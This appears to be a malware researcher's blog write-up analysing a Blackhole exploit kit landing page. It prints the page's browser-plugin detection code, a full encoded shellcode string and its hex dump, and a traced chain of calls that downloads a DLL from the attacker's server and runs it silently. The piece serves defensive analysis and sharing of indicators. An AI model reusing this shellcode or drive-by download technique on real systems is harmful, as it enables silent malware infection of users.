But actually it has the shellcode to drop another sample too, which in that story the download was failed (url is not there anymore)
While continuing busting malwares this weekend, I keep on being curious about what that shellcode can drop, can't help myself so I went to search the similar infected sites who's having the same pattern of infection code with the ALIVE dropped shellcode. And shortly, I bumped into some. In this report I am revealing it as details as possible. So, here we go.
Starting with this infected URL:The bottom line is malware distributors starts to put some new infection payload by today for this blackhole scheme, maybe after making and checking some more undetectable binaries.hxxp://festosikal.ru/main.php?page=11d2ab70b8479897It's typically blackhole, so I downloaded examine the code, here's the download proof:--14:08:50-- http://festosikal.ru/main.php?page=11d2ab70b8479897 => `main.php@page=11d2ab70b8479897' Resolving festosikal.ru... 94.185.83.78 Connecting to festosikal.ru|94.185.83.78|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 85,004 55.13K/s 14:08:54 (55.04 KB/s) - `main.php@page=11d2ab70b8479897' saved [85004]Detection in VT is very poor (one AV can detectlike this):MD5: 195c80106a724da3d146419466e3e0c3 File size: 83.0 KB ( 85004 bytes ) File name: main.php@page=11d2ab70b8479897 File type: HTML DetecRatio: 1 / 42 AnalysisDate:2012-09-02 07:20:19 UTC ( 0 分 ago ) URL --->>> [CLICK]It is a full obfuscated HTML from top to bottom, no trace of injection, Assuming the blackhole exploit kit is in 94.185.83.78 (which I am on it after I wrote this). The snip is as per below:↑You can see the the eval will be gathered in the first script while the second script is actually reading the obfuscated code stored in the <b>tag, with that know-how we can deobfs it like I pasted in this link -->>> [PASTEBIN RAW TXT] The deobfs code has the redirected message and code:
document.write('<center><h1>Please wait page is loading... </h1></center><hr>'); function end_redirect(){I confirmed tt has detection plugin of your browser's name, User Agent, OS, & having code to drop mess to your browser according to the result as per explained in the previous posted writing (again, link is -->>>HERE). Frankly, is a marvellous code. This script as aiming wether possible or not to execute its shellcode, it considers the java exploit to runs it like the coded below:PluginDetect.initScript(); PluginDetect.getVersion("."); pdfver = PluginDetect.getVersion("AdobeReader"); flashver = PluginDetect.getVersion('Flash'); javaver = PluginDetect.getVersion('Java', 'getJavaInfo.jar');With the coded shellcode raws as per below:function getShellCode(){ if (1){ return " %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u57e9%u80fe%u2830 %ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868 %u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9 %u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179 %u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1 %ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3 %u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324 %u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24 %u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0 %u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3 %uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec %uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24 %u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b %u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a %u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35 %u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7 %u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28 %u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666 %ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058 %u5c5c%u1258%u0707%u4d4e%u5c5b%u5b47%u4341%u4449%u5a06%u075d%u065f %u4058%u1758%u154e%u4e4b%u1b1a%u0e1c%u154d%u2819%u0028";Now I knew I met what I was searching for, and see what's inside of it. Just simply execute the deobfs code to get the shellcode data in the secure RAT, and getting those:41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b 5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c 29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c 0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e 2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 58 40 5c 5c 58 12 07 07 4e 4d 5b 5c 47 5b 41 43 49 44 06 5a 5d 07 5f 06 58 40 58 17 4e 15 4b 4e 1a 1b 1c 0e 4d 15 19 28 28 00 (I modified it for not to be executed as per pasted)↑You know the drill of handling this don't you? By experience, I bruteforced this shellcode to get into payload url. My tools snapshot is below:
So after some hacks, we have a payload to be downloaded below:
hxxp://festosikal.ru/w.php?f=cf234&e=1And the shellcode runs like this:It uses the kernel32.dll to run urlmon.dll and executing the calls to execute: 1. kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255) //prep 2. kernel32.LoadLibraryA(lpFileName=urlmon) // loading urlmon.dll 3. kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\]) //prep the place to drop 4. urlmon.URLDownloadToFileA(pCaller=0, szURL=http://festosikal.ru/w.php?f=cf234&e=1, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) //download malware and saved it to droppath naming it with wpbt0.dll 5. kernel32.WinExec (lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) // executing the saved malware 6. kernel32.WinExec (lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) // registering it into process 7. kernel32.TerminateThread(dwExitCode=0) //clean exit *) noted that all command is silently executed (uCmdShow=0)So let's check of what this shellcode downloaded:--14:13:19-- hxxp://festosikal.ru/w.php?f=cf234 => `w.php@f=cf234' Resolving festosikal.ru... 94.185.83.78 Connecting to festosikal.ru|94.185.83.78|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 302,592 (296K) [application/x-msdownload] 100%[====================================>] 302,592 78.13K/s ETA 00:00 14:13:24 (77.90 KB/s) - `w.php@f=cf234' saved [302592/302592]Saved it well, let's follow the shellcode logic to see the real face of this malware :I analyzed this malware and uploaded it to VirusTotal to find only 2 (two)- AntiVirus products detecting it, wrote my analysis on VT page to share; MD5: 917f28808696ba2a2c3f441824866f02 File size: 295.5 KB ( 302592 bytes ) File name: UpgradeHelper.exe File type: DOS EXE Detection ratio: 2 / 42 Analysis date: 2012-09-02 07:21:07 UTC ( 0 分 ago ) URL----------->>>[CLICK]
↑looks like we are (MalwareMustDie OP)the first who uploade this malware in VirusTotal ;-)
Bad luck for them, we moved fast! #MalwareMustDie Rocks!
